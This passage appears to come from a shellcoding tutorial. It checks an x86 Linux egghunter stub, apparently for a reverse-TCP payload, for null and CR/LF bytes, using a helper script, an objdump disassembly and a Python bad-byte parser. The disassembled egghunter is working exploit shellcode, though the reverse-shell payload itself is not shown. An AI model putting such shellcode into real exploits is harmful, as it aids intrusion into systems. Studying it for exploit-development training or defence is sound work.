Null-bytes / CRLF
Let’s check for null bytes or CR/LF characters, which might break the shellcode at runtime.
The check detects no bad characters. You say prove it! Okay, let’s check with objdump.
$ ../check_badchars.sh egghunt_rev_tcp_initial
[+] Checking ...
[+] Done!
$
Objdump check
It seems there are no initial bad characters in the assembled output, so let’s recheck with objdump.
The disassembly also shows no signs of any initial bad characters.
$ objdump -M intel -d egghunt_rev_tcp_initial

egghunt_rev_tcp_initial:     file format elf32-i386

Disassembly of section .text:

08048060 <_start>:
 8048060:   31 c9                   xor    ecx,ecx
 8048062:   eb 1e                   jmp    8048082 <begin>

08048064 <page>:
 8048064:   66 81 c9 ff 0f          or     cx,0xfff

08048069 <loop>:
 8048069:   41                      inc    ecx
 804806a:   6a 43                   push   0x43
 804806c:   58                      pop    eax
 804806d:   cd 80                   int    0x80
 804806f:   3c f2                   cmp    al,0xf2
 8048071:   74 f1                   je     8048064 <page>
 8048073:   b8 4f 44 4f 52          mov    eax,0x524f444f
 8048078:   89 cf                   mov    edi,ecx
 804807a:   af                      scas   eax,DWORD PTR es:[edi]
 804807b:   75 ec                   jne    8048069 <loop>
 804807d:   af                      scas   eax,DWORD PTR es:[edi]
 804807e:   75 e9                   jne    8048069 <loop>
 8048080:   ff e7                   jmp    edi

08048082 <begin>:
 8048082:   e8 e2 ff ff ff          call   8048069 <loop>
$
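The manual objdump recheck above can be automated. The following is an added example, not the author's check_badchars.sh (which the page does not show): it parses `objdump -d` output and reports the address of every NUL, LF or CR opcode byte. `find_bad_bytes`, `PAGE_SAMPLE` and `CONSTRUCTED_SAMPLE` are names made up for this sketch, and the second sample is constructed to show a failing case.

```python
import re

# Bytes the page checks for: NUL ends C strings, CR/LF end line-based input.
BAD_CHARS = {0x00: "NUL", 0x0A: "LF", 0x0D: "CR"}

# One instruction line of `objdump -d`: address, opcode bytes, optional text.
# Works with objdump's tab-separated columns and with space-flattened copies.
INSN_RE = re.compile(
    r"^\s*([0-9a-f]+):\s+((?:[0-9a-f]{2}\s+)*[0-9a-f]{2})(?:\s+(.*))?$")

# Lines taken from the page's disassembly (flattened to single spaces).
PAGE_SAMPLE = """\
08048060 <_start>:
8048060: 31 c9 xor ecx,ecx
8048064: 66 81 c9 ff 0f or cx,0xfff
804806a: 6a 43 push 0x43
804806c: 58 pop eax
8048073: b8 4f 44 4f 52 mov eax,0x524f444f
8048082: e8 e2 ff ff ff call 8048069 <loop>
"""

# Constructed counter-example (not from the page): loading 0x43 with a plain
# mov instead of push/pop, and pushing 0xa, both encode bad bytes.
CONSTRUCTED_SAMPLE = (
    " 8048060:\tb8 43 00 00 00       \tmov    eax,0x43\n"
    " 8048065:\t6a 0a                \tpush   0xa\n")


def find_bad_bytes(disasm, bad=BAD_CHARS):
    """Return (byte_address, byte, name, instruction) for every bad byte."""
    hits = []
    for line in disasm.splitlines():
        m = INSN_RE.match(line)
        if not m:
            continue  # file header, section header, label or blank line
        addr = int(m.group(1), 16)
        insn = (m.group(3) or "").strip()
        for i, tok in enumerate(m.group(2).split()):
            if int(tok, 16) in bad:
                hits.append((addr + i, int(tok, 16), bad[int(tok, 16)], insn))
    return hits


if __name__ == "__main__":
    for name, text in (("page", PAGE_SAMPLE), ("constructed", CONSTRUCTED_SAMPLE)):
        hits = find_bad_bytes(text)
        print(f"[+] {name}: {len(hits)} bad byte(s)")
        for addr, byte, label, insn in hits:
            print(f"    {addr:#x}: {byte:#04x} ({label}) in '{insn}'")
```

Which bytes count as bad depends on how the target reads its input; pass a different `bad` mapping to check for others.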